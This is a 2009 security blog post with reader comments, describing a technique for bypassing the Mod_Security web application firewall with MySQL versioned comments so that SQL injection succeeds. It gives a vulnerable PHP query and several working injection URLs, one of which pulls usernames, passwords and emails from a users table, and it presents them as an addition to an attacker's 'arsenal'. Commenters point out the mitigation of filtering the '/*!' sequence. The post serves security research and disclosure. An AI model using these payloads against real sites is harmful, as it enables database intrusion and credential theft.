October 28, 2009

Another fine method to exploit SQL Injection and bypass WAF

A method that I discovered today in MySQL documentation struck me with its simplicity and the fact that I haven’t noticed it before. Let me describe this method of bypassing WAF.

MySQL servers allow one to use comments of the following type:

/*!sql-code*/ and /*!12345sql-code*/

As can be noticed, SQL code will be executed from the comment in both cases! The latter construction means that "sql-code" should be executed only if the DBMS version is later than the given value.

As I have been repeatedly asserted [1,2], some WAFs skip comments during signature search. Among such WAFs, there is the latest stable assembly of Mod_Security (v. 2.5.9).

Here is a simple example:

...
$query = "SELECT name FROM table where id = ".$_GET[id];

$result = mysql_query($query);
...

If a web application is protected with Mod_Security, then the following request will be forbidden:

/?id=1+union+select+1

It is remarkable that even these requests (that are incorrect in the considered example) will be also forbidden by the WAF (HPP/HPF techniques):

/?id=1+union/*&id=*/select+table_name+from+information_schema.columns

/?id=1+union/*&blabla1=*/select+table_name&blabla2=from+information_schema.columns


But if we use the described method with comments, Mod_Security will allow our requests and we will be able to exploit an SQL Injection:

/?id=1/*!limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/

/?id=1/*!12345limit+0+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns*/

/?id=1/*!limit+0+union+select+concat_ws(0x3a,username,password,email)+from+users*/

Well, one more method to our arsenal :-)

13 comments:

  1. Nice catch. It's easy to defend against, though -- just look for the "/*!" sequence in input.

    ReplyDelete
  2. Additionally, you mention that v2.5.9 is the latest version, but v2.5.10 has been out stable for some time now. But, as Ivan mentioned above, you still need to edit the rules to look for "/*!".

    Thanks for the great article and work.

    ReplyDelete
  3. I believe that 2.5.10 rules catch this (CRS v2.0.2). Thanks!

    ReplyDelete
  4. This comment has been removed by the author.

    ReplyDelete
  5. I am impressed by the quality of information on this website. There are a lot of good resources here. Video Marketing
    App Marketing

    ReplyDelete
  6. Conveyed a complex material in a simple manner. Great job. Hendrick Honda Of Charleston

    ReplyDelete
  7. This is a really great post, thanks for sharing. I’m glad I got a chance to check out your blog!
    thanks,
    aishwarya actress

    ReplyDelete
  8. This comment has been removed by a blog administrator.

    ReplyDelete
  9. This comment has been removed by a blog administrator.

    ReplyDelete
  10. This comment has been removed by a blog administrator.

    ReplyDelete
  11. This comment has been removed by a blog administrator.

    ReplyDelete